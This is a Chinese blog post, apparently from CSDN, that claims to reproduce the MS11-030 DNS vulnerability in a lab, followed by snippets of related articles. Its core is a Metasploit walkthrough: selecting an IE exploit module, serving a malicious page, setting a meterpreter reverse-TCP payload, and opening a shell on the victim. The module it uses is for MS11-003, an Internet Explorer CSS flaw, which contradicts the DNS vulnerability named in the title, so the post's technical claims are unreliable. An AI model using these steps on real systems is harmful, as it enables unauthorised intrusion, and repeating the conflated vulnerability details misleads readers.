MS11-030-DNS 解析漏洞复现

最新推荐文章于 2024-03-17 23:14:16 发布
最新推荐文章于 2024-03-17 23:14:16 发布
阅读量2.1k 收藏 10
点赞数 2
分类专栏: 网络安全 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dl1286670932/article/details/128303554
版权

 

MS11-030:DNS 解析中的漏洞允许远程代码执行 (2509553)

安装的 Windows DNS 客户端处理链接-本地多播名称解析 (LLMNR) 查询的方法中存在一个缺陷,攻击者可利用此缺陷在 NetworkService 帐户的上下文中执行任意代码。

请注意,Windows XP 和 2003 不支持 LLMNR。要在这些平台上成功利用此漏洞,需要本地访问权限以及运行特殊应用程序的权限。但是,在 Windows Vista、2008、7 和 2008 R2 中,可以远程利用此漏洞。

Microsoft 已发布一系列用于 Windows XP、2003、Vista、2008、7 和 2008 R2 的修补程序。

复现准备

靶机:Win xp,2003,win7,and 2008R2

攻击机:kali

漏洞扫描

使用Nessus进行漏洞扫描,发现主机存在ms11-030漏洞

漏洞利用 

启动msf

msfconsole

选择漏洞利用exp

use exploit/windows/browser/ms11_003_ie_css_import

 查看配置参数

show options

设置生成的恶意网页的URL为baidu.com

为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

设置LHOST以绑定本地IP

运行命令“exploit”或者“run”开始进行攻击,

生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

设置攻击载荷

set payload windows/meterpreter/reverse_tcp

目标用户上线成功,回连攻击机

sessions   列出所有会话
sessions -i 1   进入1号会话
getuid   查看当前用户
shell    进入交换式cmd界面
chcp 65001 乱码编译

 可以看到获取到IP地址

 

建议开启windows更新,开启防火墙。打上对应的补丁包 

(同时可以利用MSF配合CS上线提权)

engDlin
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
weixin_47731659的博客
01-19 1851
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
MS11-049:Microsoft XML Editor 信息泄露漏洞(2543893)(CVE-2011-1280)
02-09
该资源只提供sqlserver2008r2补丁安装...Microsoft 已发布一系列用于 SQL Server 2005、2008 和 2008 R2 的修补程序,详请参考:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-049
Metasploit攻击win7实例(下)
jjxsir的博客
12-24 2683
配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描,如下图所示。 图12 配置Nessus扫描 扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。 图13 Nessus扫描网段结果 重点关
MS11_003 漏洞利用与安全加固
theRavensea
03-17 1742
实验在 Metasploit 下结合 XSSF 对IE 浏览器进行渗透测试,利用 MSHTML.DLL 处理悬挂指针漏洞MS11-003)。MSHTML.DLL 是一个用于解析 HTML 语言的动态链接库,IE、Outlook、Outlook Express 等应用程序都使用了该动态链接库。 MS11_030 漏洞产生的原因:Internet Explorer 在事件处理的实现上存在远程代码执行漏洞,攻击者可利用此漏洞在受影响应用程序中运行任意代码,造成拒绝服务。在处理某些对象操作时,MSHTML.DL
DNS域传送漏洞复现
yxngu
03-10 149
DNS域传送漏洞 DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞
MS11-003在Internet Explorer中存在允许远程代码执行漏洞复现
sGanYu
11-14 2920
漏洞描述 利用IE(包含IE6、IE7、IE8)对CSS的解析存在的一个问题,使得任何访问包含非法CSS的页面导致IE奔溃重启,也就是说攻击者只需让用户访问一个特制的网页或者加载了一个非法的CSS的网页时,便可以获得与本地用户相同的权限 受影响的系统 Windows XP SP 2 Windows XP SP 3 Windows Vista SP 1 Windows Vista SP 2 Windows Server 2008 Windows Se
DNS服务器漏洞
itclock的专栏
07-28 1325
Infoworld 报道,著名黑客HD Moore已经率先公布了可用代码.利用这段代码可以对DNS服务器进行投毒,将一条恶意纪录植入目标服务器,该服务器将随机发起域名查询,此时攻击者可以提供伪造的响应,将域名服务器中的纪录指向其特定站点.这个漏洞攻击可以默默的改变用户的升级服务下载恶意软件,IOActive研究者Dan Kaminsky很早发现漏洞并且无意中这周公布了漏洞使得开发出攻击代码.i
MS11-046.rar_ms11_ms11-011_visual c
09-21
【标题】"MS11-046.rar_ms11_ms11-011_visual c" 涉及的是微软在2011年发布的一个安全更新,主要修复了Visual C++运行库中的一个严重漏洞,该漏洞编号为MS11-046。这个压缩包可能包含了用于理解和分析该漏洞的源代码...
深入分析MS11-058
12-02
### 深入分析MS11-058:一项复杂的整数溢出漏洞 #### 漏洞概述 MS11-058是由微软发布的安全公告之一,该公告指出了一个被评为“严重”级别的安全漏洞。根据微软的官方描述,这一漏洞源于一个简单的整数溢出问题,...
MS11-046 ms11-080 提权exploit
12-02
标题中的“MS11-046”和“ms11-080”是微软安全公告的编号,这些编号通常用于标识特定的安全更新或漏洞。在这个案例中,这两个编号分别对应于两个不同的本地提权漏洞。让我们深入探讨这两个漏洞以及它们的exploit...
长老漏洞(ms11-011)利用方式及工具!
03-07
长老漏洞利用方式及工具!ms11-011
MS11_080.zip_MS11-080_MS11_080_ms11_ms11-011_ms11080.exe
09-14
MS11-080_MS11_080_ms11_ms11-011_ms11080.exe"涉及的是微软在2011年发布的一个关键安全更新,解决了一个名为“Windows Kernel Use After Free”(Windows内核释放后使用)的严重漏洞,该漏洞被标识为MS11-080。...
MS11_003 漏洞复现
FMBOY
11-11 1876
​1、使用msfconsole命令打开Metasploit渗透测试平台 使用search命令搜索ms11_003_ie_css_import模块 search ms11-003 使用use命令对该模块进行调用,并通过show options命令查看模块的详细配置参数 use exploit/windows/browser/ms11_003_ie_css_import show options
如何利用MS11_003 IE 漏洞攻击win7主机
2301_77778745的博客
04-25 385
12、验证攻击是否成功,可以列出会话,并进入查看攻击者的身份。也可以用getsystem进行进一步提权,提权失败可以上传提权exe程序进行提权的方案获得最高权限(这点并没有尝试。10、运行命令“exploit”开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页。5、为了防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080。4、假设,设置生成的恶意网页的URI为baidu.com。11、打开靶机,访问目标网址,模拟受害者误入,若如图所示。9、为避免冲突设置LPORT。
Windows DNS 欺骗漏洞CVE-2023-32020、kb5027271此更新不适用于你的计算机解决方案
CSDNnian的博客
07-11 886
操作系统:WindowsServer 2012R2漏洞名称:Windosw DNS 欺骗漏洞 CVE-2023-32020下载的更新包:kb5027271。
DNS域传送漏洞
Just for funnnnnnnnnnnn
01-04 972
原理在正常情况下,为了防止一台DSN服务器不工作后整个域名解析工作受到影响,通常会有备用的DNS服务器。而备用的DNS服务器为了保持记录与主DNS服务器一致需要通过dns域传送来获得最新的数据。dns域传送漏洞就发生在这里。由于错误的配置,本来应该只有dns备用服务器能够申请的dns域传送数据能够被发送到匿名申请的其他客户端,导致dns信息暴露。附:常用DNS记录:主机记录(A记录): A记录是用于
DNS域传送漏洞详解和利用
0XAXSDD的博客
03-16 1283
DNS域传送漏洞详解 首先我们得知道一下域名解析到底有啥用? 先看看官方术语: 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务 这里就解释得很明白了, 首先域名解析是一种服务! 干啥用的嘞? “把域名信息转换成对应的ip信息” 为啥要转换嘞? “方便用户使用,因为ip地址实在不好记鸭!” 这里我们继续了解一个概念 DNS服务器器上的:分布式分层数...
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2039
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
Metasploit攻击win7实例
qq_45768092的博客
10-23 2117
Metasploit攻击win7实例 本实验主要介绍了metasploit攻击win7的过程,通过本实验的学习,你能够了解kali下Nessus漏洞扫描工具的安装,掌握利用Nessus扫描目标主机,学会使用metasploit对win7系统的攻击。 实验简介 实验所属系列: 安全工具使用 实验对象:本科/专科信息安全专业 相关课程及专业: linux基础、网络安全 实验类别: 实践实验类 预备知识 Nessus基本介绍 Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的
MS11-004漏洞全称
最新发布
03-19
MS11-004漏洞的全称是"Microsoft Windows Shell Graphics Processing Remote Code Execution Vulnerability",该漏洞存在于Microsoft Windows操作系统的Shell Graphics Processing组件中。攻击者可以通过构造恶意的图像文件,利用该漏洞执行远程代码,从而获取系统的控制权。这个漏洞影响了多个Windows操作系统版本,包括Windows XP、Windows Vista、Windows 7和Windows Server 2008等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

engDlin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值